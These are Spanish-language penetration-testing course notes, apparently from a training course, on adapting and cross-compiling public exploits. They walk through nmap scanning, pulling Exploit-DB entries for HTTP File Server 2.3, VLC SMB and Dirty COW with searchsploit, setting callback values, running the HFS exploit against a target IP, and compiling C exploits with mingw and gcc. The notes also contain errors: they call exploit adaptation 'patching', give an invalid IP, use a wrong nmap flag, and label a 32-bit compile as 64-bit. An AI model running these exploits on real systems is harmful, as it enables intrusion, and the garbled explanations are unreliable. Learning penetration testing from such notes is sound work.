Fixing Exploits

Fixing Exploits

Fixing Exploits consiste en analizar el código del exploit y realizar pruebas para identificar vulnerabilidades. También involucra aplicar parches o modificaciones necesarias para eliminar dichas vulnerabilidades y asegurar que el sistema no pueda ser comprometido en el futuro.

Demo: Fixing Exploits

Este demo muestra cómo buscar y modificar un exploit para corregir vulnerabilidades. A continuación, se detallan los pasos:

1. Escanear el sistema objetivo con Nmap:

   nmap -sv 10.4.23.75

   Esto identificará los servicios y versiones ejecutados en la dirección IP especificada.

2. Buscar exploits conocidos con SearchSploit:

   searchsploit HTTP File Server 2.3
   searchsploit -m 39161

   Utilice SearchSploit para encontrar exploits asociados con la versión del servicio identificado. El comando -m 39161 extrae una copia del exploit para su modificación.

3. Modificar el archivo del exploit: Abra el archivo descargado (39161.py) en un editor de texto para ajustarlo según sea necesario:

   vim 39161.py

   Edite las variables ip_addr y local_port con los valores correctos para su entorno:

   ip_addr = "10.10.0.1234"  # Dirección IP local
   local_port = 80          # Número de puerto local

4. Ejecutar el exploit modificado: Revise los requisitos adicionales necesarios y ejecute el exploit:

   python 39161.py 10.4.23.75 80

   Asegúrese de ajustar cualquier otra configuración requerida para que el script funcione correctamente y pruebe que la vulnerabilidad ha sido corregida.

Quiz: Fixing Exploits

Cross-Compiling Exploits

En algunos casos, el código de explotación se desarrollará en C/C++/C#, por lo que deberá compilarlo en un archivo ejecutable portátil (PE) o binario.

La compilación cruzada es el proceso de compilar código para una plataforma distinta a la que realiza la compilación.

Como evaluador de penetración, deberá tener las habilidades necesarias para compilar el código de explotación desarrollado en C.

Demo: Cross-Compiling Exploits

sudo apt-get install mingw-w64

# mingw-w64 se utiliza para la compilación cruzada de programas de C/C++ para Windows en sistemas Linux.

searchsploit VideoLAN VLC SMB

searchsploit -m 9303
# el script del exploit puede traer consigo una descripción de cómo se compila el código
# y los argumentos que se deben de utilizar

# compilar para win 64
i686-w64-mingw32-gcc 9303.c -o exploit
$ ls
exploit.exe
9303.c

# compilar para win 32
i686-w64-mingw32-gcc 9303.c -o exploit -lws2_32

# otro ejemplo
searchsploit Dirty Cow
searchsploit -m 40839

# compilación
gcc -pthread 40839.c -o exploit -lcrypt

Existen exploits de binarios de Windows y Linux, en donde ya tienen la compilación cruzada y están funcionando de forma correcta.

GitHub - offensive-security/exploitdb-bin-sploits: The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb-bin-sploitsGitHub

Quiz: Cross-Compiling Exploits